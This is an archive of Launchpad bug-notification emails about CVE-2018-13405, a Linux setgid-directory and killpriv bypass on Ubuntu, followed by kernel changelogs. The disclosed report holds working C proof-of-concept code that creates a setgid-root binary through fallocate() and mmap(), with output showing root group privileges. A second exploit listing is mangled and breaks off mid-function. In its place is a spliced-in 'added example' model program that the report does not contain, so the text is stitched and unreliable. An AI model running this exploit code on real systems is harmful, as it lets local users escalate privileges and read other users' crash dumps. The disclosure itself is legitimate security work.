[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
** Changed in: linux (Ubuntu Cosmic)
   Status: In Progress => Won't Fix

** Changed in: linux (Ubuntu)
   Status: In Progress => Fix Released

--
You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह (Group of Nepali translators), which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1779923

Title:
  other users' coredumps can be read via setgid directory and killpriv bypass

Status in linux package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in linux source package in Bionic:
  Fix Released
Status in linux source package in Cosmic:
  Won't Fix

Bug description:
  Note: I am both sending this bug report to secur...@kernel.org and filing it in the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug or as an Ubuntu bug. You may wish to talk to each other to determine the best place to fix this.

  I noticed halfdog's old writeup at https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ , describing essentially the following behavior in combination with a trick for then writing to the resulting file without triggering the killpriv logic:

  =
  user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
  user@debian:~/sgid_demo$ cat > demo.c
  #include <fcntl.h>

  int main(void) {
    /* the directory is setgid root and world-writable: the new file
     * inherits group root and keeps the requested setgid bit */
    open("dir/file", O_RDONLY|O_CREAT, 02755);
  }
  user@debian:~/sgid_demo$ gcc -o demo demo.c
  user@debian:~/sgid_demo$ ./demo
  user@debian:~/sgid_demo$ ls -l dir/file
  -rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
  =

  Two patches for this were proposed on LKML back then:

  "[PATCH 1/2] fs: Check f_cred instead of current's creds in should_remove_suid()"
  https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.l...@kernel.org/

  "[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid directory"
  https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.l...@kernel.org/

  However, as far as I can tell, neither of them actually landed.

  You can also bypass the killpriv logic with fallocate() and mmap() - fallocate() permits resizing the file without triggering killpriv, mmap() permits writing without triggering killpriv (the mmap part is mentioned at https://lore.kernel.org/lkml/cagxu5jlu6ogkqugqrcoyq6dabowz9hx3fuq+-zc7njlukgk...@mail.gmail.com/ ):

  =
  user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
  user@debian:~/sgid_demo$ cat fallocate.c
  #define _GNU_SOURCE
  #include <err.h>
  #include <fcntl.h>
  #include <string.h>
  #include <unistd.h>
  #include <sys/mman.h>
  #include <sys/stat.h>
  #include <sys/types.h>

  int main(void) {
    /* source binary whose contents will end up in the setgid file */
    int src_fd = open("/usr/bin/id", O_RDONLY);
    if (src_fd == -1) err(1, "open 2");
    struct stat src_stat;
    if (fstat(src_fd, &src_stat)) err(1, "fstat");
    int src_len = src_stat.st_size;
    char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
    if (src_mapping == MAP_FAILED) err(1, "mmap 2");

    /* created inside the setgid dir: group root, setgid bit retained */
    int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755);
    if (fd == -1) err(1, "open");
    /* grow the file without write(), so killpriv is never consulted */
    if (fallocate(fd, 0, 0, src_len)) err(1, "fallocate");
    /* fill it through a shared mapping, again without write() */
    char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
    if (mapping == MAP_FAILED) err(1, "mmap");
    memcpy(mapping, src_mapping, src_len);
    munmap(mapping, src_len);
    close(fd);
    close(src_fd);

    execl("./dir/file", "id", NULL);
    err(1, "execl");
  }
  user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c
  user@debian:~/sgid_demo$ ./fallocate
  uid=1000(user) gid=1000(user) egid=0(root) groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user)
  =

  sys_copy_file_range() also looks as if it bypasses killpriv on supported filesystems, but I haven't tested that one so far.

  On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and contains group-readable crashdumps in some custom format, so you can use this issue to steal other users' crashdumps:

  =
  user@ubuntu-18-04-vm:~$ ls -l /var/crash
  total 296
  -rw-r----- 1 user whoopsie  16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
  -rw-r----- 1 root whoopsie  50706 Jun 25 21:51 _usr_bin_id.0.crash
  -rw-r----- 1 user whoopsie  51842 Jun 25 21:42 _usr_bin_id.1000.crash
  -rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
  -rw-r----- 1 root whoopsie  18765 Jun 26 00:42 _usr_bin_xattr.0.crash
  user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash
  cat: /var/crash/_usr_bin_id.0.crash: Permission denied
  user@ubuntu-18-04-vm:~$ cat fallocate.c
  #define _GNU_SOURCE
  #include #include #include #include #include #include #include #include
  int main(int argc, char **argv) {
    if (argc != 2) {
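The following C program is an added example, not code from the bug report, from Ubuntu or from the kernel. It models in user space the two kernel decisions the report turns on, so the vulnerable and the fixed behaviour can be compared side by side without a setgid directory or root at hand: what mode and group a non-directory created in a setgid directory receives (the check added by the bionic fix "Fix up non-directory creation in SGID directories" is modelled by the fixed flag), which bits a write() asks to strip (the killpriv path that fallocate() and stores through a MAP_SHARED mapping never enter), and the precondition check on a directory such as /var/crash. The logic is paraphrased from the kernel's inode_init_owner() and should_remove_suid(); the function names, the gid 117 standing in for "whoopsie" and the sample group lists are this example's own assumptions.

```c
/* Added example: user-space model of the kernel decisions behind
 * CVE-2018-13405.  Not the kernel's code; names and sample gids are
 * constructed for this example. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>

#define ATTR_KILL_SUID 0x0800   /* values as in include/linux/fs.h */
#define ATTR_KILL_SGID 0x1000

/* Creator's credentials: primary + supplementary groups, CAP_FSETID. */
struct creds {
    const gid_t *groups;
    size_t ngroups;
    bool cap_fsetid;
};

static bool in_group(const struct creds *c, gid_t gid)
{
    for (size_t i = 0; i < c->ngroups; i++)
        if (c->groups[i] == gid)
            return true;
    return false;
}

/* Model of inode_init_owner() for a non-directory child.  Returns the
 * child's mode and stores its group in *out_gid.  fixed == false is the
 * vulnerable behaviour; fixed == true adds the check from the fix: a
 * group-executable setgid file is only allowed to keep S_ISGID if the
 * creator is in the directory's group or has CAP_FSETID. */
mode_t model_init_owner(mode_t dir_mode, gid_t dir_gid, gid_t creator_gid,
                        mode_t mode, const struct creds *c, bool fixed,
                        gid_t *out_gid)
{
    *out_gid = creator_gid;
    if (dir_mode & S_ISGID) {
        *out_gid = dir_gid;          /* child inherits the directory's group */
        if (fixed &&
            (mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP) &&
            !in_group(c, dir_gid) && !c->cap_fsetid)
            mode &= ~S_ISGID;        /* not your group: no setgid for you */
    }
    return mode;
}

/* Model of should_remove_suid(): the bits a write() through the page
 * cache asks notify_change() to clear.  setgid without group-exec is the
 * mandatory-locking flag, not a privilege, so it is left alone.
 * fallocate() and MAP_SHARED stores do not go through this function. */
int model_should_remove_suid(mode_t mode)
{
    int kill = 0;
    if (mode & S_ISUID)
        kill = ATTR_KILL_SUID;
    if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP))
        kill |= ATTR_KILL_SGID;
    return kill;
}

/* Precondition check: setgid directory, writable by everyone, owned by a
 * group the caller is not in (for /var/crash on bionic: 03777, whoopsie). */
bool sgid_dir_exploitable(mode_t dir_mode, gid_t dir_gid, const struct creds *c)
{
    return (dir_mode & S_ISGID) && (dir_mode & S_IWOTH) && !in_group(c, dir_gid);
}

int main(void)
{
    const gid_t user_groups[] = { 1000, 24 };   /* constructed: user, cdrom */
    struct creds user = { user_groups, 2, false };
    const gid_t whoopsie = 117;                 /* constructed gid for "whoopsie" */
    gid_t gid;

    printf("/var/crash exploitable for uid 1000: %s\n",
           sgid_dir_exploitable(03777, whoopsie, &user) ? "yes" : "no");
    mode_t before = model_init_owner(03777, whoopsie, 1000, 02755, &user, false, &gid);
    printf("before fix: mode %04o gid %u\n", (unsigned)before, (unsigned)gid);
    mode_t after = model_init_owner(03777, whoopsie, 1000, 02755, &user, true, &gid);
    printf("after fix:  mode %04o gid %u\n", (unsigned)after, (unsigned)gid);
    printf("a write() would clear 0x%x; fallocate()/mmap() never ask\n",
           model_should_remove_suid(before));
    return 0;
}
```

Compile with `gcc -std=c99 -Wall` and run as any user; it touches no filesystem. To confirm a live kernel, run the report's fallocate.c in a directory prepared as the report shows: on a fixed kernel `ls -l dir/file` shows `-rwxr-xr-x` (setgid dropped at creation), on a vulnerable one `-rwxr-sr-x`.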
[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
This bug was fixed in the package linux - 3.13.0-157.207

---
linux (3.13.0-157.207) trusty; urgency=medium

  * linux: 3.13.0-157.207 -proposed tracker (LP: #1787982)

  * CVE-2017-5715 (Spectre v2 retpoline)
    - SAUCE: Fix "x86/retpoline/entry: Convert entry assembler indirect jumps"

  * CVE-2017-2583
    - KVM: x86: fix emulation of "MOV SS, null selector"

  * CVE-2017-7518
    - KVM: x86: fix singlestepping over syscall

  * CVE-2017-18270
    - KEYS: prevent creating a different user's keyrings

  * Update to upstream's implementation of Spectre v1 mitigation (LP: #1774181)
    - Documentation: Document array_index_nospec
    - array_index_nospec: Sanitize speculative array de-references
    - x86: Implement array_index_mask_nospec
    - x86: Introduce barrier_nospec
    - x86/get_user: Use pointer masking to limit speculation
    - x86/syscall: Sanitize syscall table de-references under speculation
    - vfs, fdtable: Prevent bounds-check bypass via speculative execution
    - nl80211: Sanitize array index in parse_txq_params
    - x86/spectre: Report get_user mitigation for spectre_v1
    - x86/kvm: Update spectre-v1 mitigation
    - nospec: Allow index argument to have const-qualified type
    - nospec: Move array_index_nospec() parameter checking into separate macro
    - nospec: Kill array_index_nospec_mask_check()
    - SAUCE: Replace osb() calls with array_index_nospec()
    - SAUCE: Rename osb() to barrier_nospec()
    - SAUCE: x86: Use barrier_nospec in arch/x86/um/asm/barrier.h

  * Prevent speculation on user controlled pointer (LP: #1775137)
    - x86: reorganize SMAP handling in user space accesses
    - x86: fix SMAP in 32-bit environments
    - x86: Introduce __uaccess_begin_nospec() and uaccess_try_nospec
    - x86/usercopy: Replace open coded stac/clac with __uaccess_{begin, end}
    - x86/uaccess: Use __uaccess_begin_nospec() and uaccess_try_nospec

  * CVE-2016-10208
    - ext4: validate s_first_meta_bg at mount time
    - ext4: fix fencepost in s_first_meta_bg validation

  * CVE-2018-10323
    - xfs: set format back to extents if xfs_bmap_extents_to_btree

  * CVE-2017-16911
    - usbip: prevent vhci_hcd driver from leaking a socket pointer address

  * CVE-2018-13406
    - video: uvesafb: Fix integer overflow in allocation

  * CVE-2018-10877
    - ext4: verify the depth of extent tree in ext4_find_extent()

  * CVE-2018-10881
    - ext4: clear i_data in ext4_inode_info when removing inline data

  * CVE-2018-1092
    - ext4: fail ext4_iget for root directory if unallocated

  * CVE-2018-1093
    - ext4: fix block bitmap validation when bigalloc, ^flex_bg
    - ext4: add validity checks for bitmap block numbers

  * CVE-2018-12233
    - jfs: Fix inconsistency between memory allocation and ea_buf->max_size

  * CVE-2017-16912
    - usbip: fix stub_rx: get_pipe() to validate endpoint number

  * CVE-2018-10675
    - mm/mempolicy: fix use after free when calling get_mempolicy

  * CVE-2017-8831
    - saa7164: fix sparse warnings
    - saa7164: fix double fetch PCIe access condition

  * CVE-2017-16533
    - HID: usbhid: fix out-of-bounds bug

  * CVE-2017-16538
    - media: dvb-usb-v2: lmedm04: move ts2020 attach to dm04_lme2510_tuner
    - media: dvb-usb-v2: lmedm04: Improve logic checking of warm start

  * CVE-2017-16644
    - hdpvr: Remove deprecated create_singlethread_workqueue
    - media: hdpvr: Fix an error handling path in hdpvr_probe()

  * CVE-2017-16645
    - Input: ims-psu - check if CDC union descriptor is sane

  * CVE-2017-5549
    - USB: serial: kl5kusb105: fix line-state error handling

  * CVE-2017-16532
    - usb: usbtest: fix NULL pointer dereference

  * CVE-2017-16537
    - media: imon: Fix null-ptr-deref in imon_probe

  * CVE-2017-11472
    - ACPICA: Add additional debug info/statements
    - ACPICA: Namespace: fix operand cache leak

  * CVE-2017-16643
    - Input: gtco - fix potential out-of-bound access

  * CVE-2017-16531
    - USB: fix out-of-bounds in usb_set_configuration

  * CVE-2018-10124
    - kernel/signal.c: avoid undefined behaviour in kill_something_info

  * CVE-2017-6348
    - irda: Fix lockdep annotations in hashbin_delete().

  * CVE-2017-17558
    - USB: core: prevent malicious bNumInterfaces overflow

  * CVE-2017-5897
    - ip6_gre: fix ip6gre_err() invalid reads

  * CVE-2017-6345
    - SAUCE: import sock_efree()
    - net/llc: avoid BUG_ON() in skb_orphan()

  * CVE-2017-7645
    - nfsd: check for oversized NFSv2/v3 arguments

  * CVE-2017-9984
    - ALSA: msnd: Optimize / harden DSP and MIDI loops

  * CVE-2018-1000204
    - scsi: sg: allocate with __GFP_ZERO in sg_build_indirect()

  * CVE-2018-10021
    - scsi: libsas: defer ata device eh commands to libata

  * CVE-2017-16914
    - usbip: fix stub_send_ret_submit() vulnerability to null transfer_buffer

  * CVE-2017-16913
    - usbip: fix stub_rx: harden CMD_SUBMIT path to handle malicious input

  * CVE-2017-16535
    - USB: core: fix out-of-bounds access bug in
[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
This bug was fixed in the package linux - 4.4.0-134.160

---
linux (4.4.0-134.160) xenial; urgency=medium

  * linux: 4.4.0-134.160 -proposed tracker (LP: #1787177)

  * locking sockets broken due to missing AppArmor socket mediation patches (LP: #1780227)
    - UBUNTU SAUCE: apparmor: fix apparmor mediating locking non-fs, unix sockets

  * Backport namespaced fscaps to xenial 4.4 (LP: #1778286)
    - Introduce v3 namespaced file capabilities
    - commoncap: move assignment of fs_ns to avoid null pointer dereference
    - capabilities: fix buffer overread on very short xattr
    - commoncap: Handle memory allocation failure.

  * Xenial update to 4.4.140 stable release (LP: #1784409)
    - usb: cdc_acm: Add quirk for Uniden UBC125 scanner
    - USB: serial: cp210x: add CESINEL device ids
    - USB: serial: cp210x: add Silicon Labs IDs for Windows Update
    - n_tty: Fix stall at n_tty_receive_char_special().
    - staging: android: ion: Return an ERR_PTR in ion_map_kernel
    - n_tty: Access echo_* variables carefully.
    - x86/boot: Fix early command-line parsing when matching at end
    - ath10k: fix rfc1042 header retrieval in QCA4019 with eth decap mode
    - i2c: rcar: fix resume by always initializing registers before transfer
    - ipv4: Fix error return value in fib_convert_metrics()
    - kprobes/x86: Do not modify singlestep buffer while resuming
    - nvme-pci: initialize queue memory before interrupts
    - netfilter: nf_tables: use WARN_ON_ONCE instead of BUG_ON in nft_do_chain()
    - ARM: dts: imx6q: Use correct SDMA script for SPI5 core
    - ubi: fastmap: Correctly handle interrupted erasures in EBA
    - mm: hugetlb: yield when prepping struct pages
    - tracing: Fix missing return symbol in function_graph output
    - scsi: sg: mitigate read/write abuse
    - s390: Correct register corruption in critical section cleanup
    - drbd: fix access after free
    - cifs: Fix infinite loop when using hard mount option
    - jbd2: don't mark block as modified if the handle is out of credits
    - ext4: make sure bitmaps and the inode table don't overlap with bg descriptors
    - ext4: always check block group bounds in ext4_init_block_bitmap()
    - ext4: only look at the bg_flags field if it is valid
    - ext4: verify the depth of extent tree in ext4_find_extent()
    - ext4: include the illegal physical block in the bad map ext4_error msg
    - ext4: clear i_data in ext4_inode_info when removing inline data
    - ext4: add more inode number paranoia checks
    - ext4: add more mount time checks of the superblock
    - ext4: check superblock mapped prior to committing
    - HID: i2c-hid: Fix "incomplete report" noise
    - HID: hiddev: fix potential Spectre v1
    - HID: debug: check length before copy_to_user()
    - x86/mce: Detect local MCEs properly
    - x86/mce: Fix incorrect "Machine check from unknown source" message
    - media: cx25840: Use subdev host data for PLL override
    - mm, page_alloc: do not break __GFP_THISNODE by zonelist reset
    - dm bufio: avoid sleeping while holding the dm_bufio lock
    - dm bufio: drop the lock when doing GFP_NOIO allocation
    - mtd: rawnand: mxc: set spare area size register explicitly
    - dm bufio: don't take the lock in dm_bufio_shrink_count
    - mtd: cfi_cmdset_0002: Change definition naming to retry write operation
    - mtd: cfi_cmdset_0002: Change erase functions to retry for error
    - mtd: cfi_cmdset_0002: Change erase functions to check chip good only
    - netfilter: nf_log: don't hold nf_log_mutex during user access
    - staging: comedi: quatech_daqp_cs: fix no-op loop daqp_ao_insn_write()
    - Linux 4.4.140

  * Xenial update to 4.4.139 stable release (LP: #1784382)
    - xfrm6: avoid potential infinite loop in _decode_session6()
    - netfilter: ebtables: handle string from userspace with care
    - ipvs: fix buffer overflow with sync daemon and service
    - atm: zatm: fix memcmp casting
    - net: qmi_wwan: Add Netgear Aircard 779S
    - net/sonic: Use dma_mapping_error()
    - Revert "Btrfs: fix scrub to repair raid6 corruption"
    - tcp: do not overshoot window_clamp in tcp_rcv_space_adjust()
    - Btrfs: make raid6 rebuild retry more
    - usb: musb: fix remote wakeup racing with suspend
    - bonding: re-evaluate force_primary when the primary slave name changes
    - tcp: verify the checksum of the first data segment in a new connection
    - ext4: update mtime in ext4_punch_hole even if no blocks are released
    - ext4: fix fencepost error in check for inode count overflow during resize
    - driver core: Don't ignore class_dir_create_and_add() failure.
    - btrfs: scrub: Don't use inode pages for device replace
    - ALSA: hda - Handle kzalloc() failure in snd_hda_attach_pcm_stream()
    - ALSA: hda: add dock and led support for HP EliteBook 830 G5
    - ALSA: hda: add dock and led support for HP ProBook 640 G4
    - cpufreq: Fix new policy initialization during limits updates via
[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
This bug was fixed in the package linux - 4.15.0-33.36

---
linux (4.15.0-33.36) bionic; urgency=medium

  * linux: 4.15.0-33.36 -proposed tracker (LP: #1787149)

  * RTNL assertion failure on ipvlan (LP: #1776927)
    - ipvlan: drop ipv6 dependency
    - ipvlan: use per device spinlock to protect addrs list updates
    - SAUCE: fix warning from "ipvlan: drop ipv6 dependency"

  * ubuntu_bpf_jit test failed on Bionic s390x systems (LP: #1753941)
    - test_bpf: flag tests that cannot be jited on s390

  * HDMI/DP audio can't work on the laptop of Dell Latitude 5495 (LP: #1782689)
    - drm/nouveau: fix nouveau_dsm_get_client_id()'s return type
    - drm/radeon: fix radeon_atpx_get_client_id()'s return type
    - drm/amdgpu: fix amdgpu_atpx_get_client_id()'s return type
    - platform/x86: apple-gmux: fix gmux_get_client_id()'s return type
    - ALSA: hda: use PCI_BASE_CLASS_DISPLAY to replace PCI_CLASS_DISPLAY_VGA
    - vga_switcheroo: set audio client id according to bound GPU id

  * locking sockets broken due to missing AppArmor socket mediation patches (LP: #1780227)
    - UBUNTU SAUCE: apparmor: fix apparmor mediating locking non-fs, unix sockets

  * Update2 for ocxl driver (LP: #1781436)
    - ocxl: Fix page fault handler in case of fault on dying process

  * netns: unable to follow an interface that moves to another netns (LP: #1774225)
    - net: core: Expose number of link up/down transitions
    - dev: always advertise the new nsid when the netns iface changes
    - dev: advertise the new ifindex when the netns iface changes

  * [Bionic] Disk IO hangs when using BFQ as io scheduler (LP: #1780066)
    - block, bfq: fix occurrences of request finish method's old name
    - block, bfq: remove batches of confusing ifdefs
    - block, bfq: add requeue-request hook

  * HP ProBook 455 G5 needs mute-led-gpio fixup (LP: #1781763)
    - ALSA: hda: add mute led support for HP ProBook 455 G5

  * [Bionic] bug fixes to improve stability of the ThunderX2 i2c driver (LP: #1781476)
    - i2c: xlp9xx: Fix issue seen when updating receive length
    - i2c: xlp9xx: Make sure the transfer size is not more than I2C_SMBUS_BLOCK_SIZE

  * x86/kvm: fix LAPIC timer drift when guest uses periodic mode (LP: #1778486)
    - x86/kvm: fix LAPIC timer drift when guest uses periodic mode

  * Please include ax88179_178a and r8152 modules in d-i udeb (LP: #1771823)
    - [Config:] d-i: Add ax88179_178a and r8152 to nic-modules

  * Nvidia fails after switching its mode (LP: #1778658)
    - PCI: Restore config space on runtime resume despite being unbound

  * Kernel error "task zfs:pid blocked for more than 120 seconds" (LP: #1781364)
    - SAUCE: (noup) zfs to 0.7.5-1ubuntu16.3

  * CVE-2018-12232
    - PATCH 1/1] socket: close race condition between sock_close() and sockfs_setattr()

  * CVE-2018-10323
    - xfs: set format back to extents if xfs_bmap_extents_to_btree

  * change front mic location for more lenovo m7/8/9xx machines (LP: #1781316)
    - ALSA: hda/realtek - Fix the problem of two front mics on more machines
    - ALSA: hda/realtek - two more lenovo models need fixup of MIC_LOCATION

  * Cephfs + fscache: unable to handle kernel NULL pointer dereference at IP: jbd2__journal_start+0x22/0x1f0 (LP: #1783246)
    - ceph: track read contexts in ceph_file_info

  * Touchpad of ThinkPad P52 failed to work with message "lost sync at byte" (LP: #1779802)
    - Input: elantech - fix V4 report decoding for module with middle key
    - Input: elantech - enable middle button of touchpads on ThinkPad P52

  * xhci_hcd :00:14.0: Root hub is not suspended (LP: #1779823)
    - usb: xhci: dbc: Fix lockdep warning
    - usb: xhci: dbc: Don't decrement runtime PM counter if DBC is not started

  * CVE-2018-13406
    - video: uvesafb: Fix integer overflow in allocation

  * CVE-2018-10840
    - ext4: correctly handle a zero-length xattr with a non-zero e_value_offs

  * CVE-2018-11412
    - ext4: do not allow external inodes for inline data

  * CVE-2018-10881
    - ext4: clear i_data in ext4_inode_info when removing inline data

  * CVE-2018-12233
    - jfs: Fix inconsistency between memory allocation and ea_buf->max_size

  * CVE-2018-12904
    - kvm: nVMX: Enforce cpl=0 for VMX instructions

  * Error parsing PCC subspaces from PCCT (LP: #1528684)
    - mailbox: PCC: erroneous error message when parsing ACPI PCCT

  * CVE-2018-13094
    - xfs: don't call xfs_da_shrink_inode with NULL bp

  * other users' coredumps can be read via setgid directory and killpriv bypass (LP: #1779923) // CVE-2018-13405
    - Fix up non-directory creation in SGID directories

  * Invoking obsolete 'firmware_install' target breaks snap build (LP: #1782166)
    - snapcraft.yaml: stop invoking the obsolete (and non-existing) 'firmware_install' target

  * snapcraft.yaml: missing ubuntu-retpoline-extract-one script breaks the build (LP: #1782116)
    - snapcraft.yaml: copy
[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
** No longer affects: whoopsie (Ubuntu)

** No longer affects: whoopsie (Ubuntu Trusty)

** No longer affects: whoopsie (Ubuntu Xenial)

** No longer affects: whoopsie (Ubuntu Bionic)

** No longer affects: whoopsie (Ubuntu Cosmic)

--
https://bugs.launchpad.net/bugs/1779923

Status in linux package in Ubuntu:
  In Progress
Status in linux source package in Trusty:
  In Progress
Status in linux source package in Xenial:
  In Progress
Status in linux source package in Bionic:
  In Progress
Status in linux source package in Cosmic:
  In Progress
[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
I don't think the Security or Foundations teams plan to make any changes in Whoopsie, so I'm marking these tasks as invalid.

** Changed in: whoopsie (Ubuntu Trusty)
   Status: New => Invalid

** Changed in: whoopsie (Ubuntu Xenial)
   Status: New => Invalid

** Changed in: whoopsie (Ubuntu Bionic)
   Status: New => Invalid

** Changed in: whoopsie (Ubuntu Cosmic)
   Status: New => Invalid

--
https://bugs.launchpad.net/bugs/1779923

Status in linux package in Ubuntu:
  In Progress
Status in whoopsie package in Ubuntu:
  Invalid
Status in linux source package in Trusty:
  In Progress
Status in whoopsie source package in Trusty:
  Invalid
Status in linux source package in Xenial:
  In Progress
Status in whoopsie source package in Xenial:
  Invalid
Status in linux source package in Bionic:
  In Progress
Status in whoopsie source package in Bionic:
  Invalid
Status in linux source package in Cosmic:
  In Progress
Status in whoopsie source package in Cosmic:
  Invalid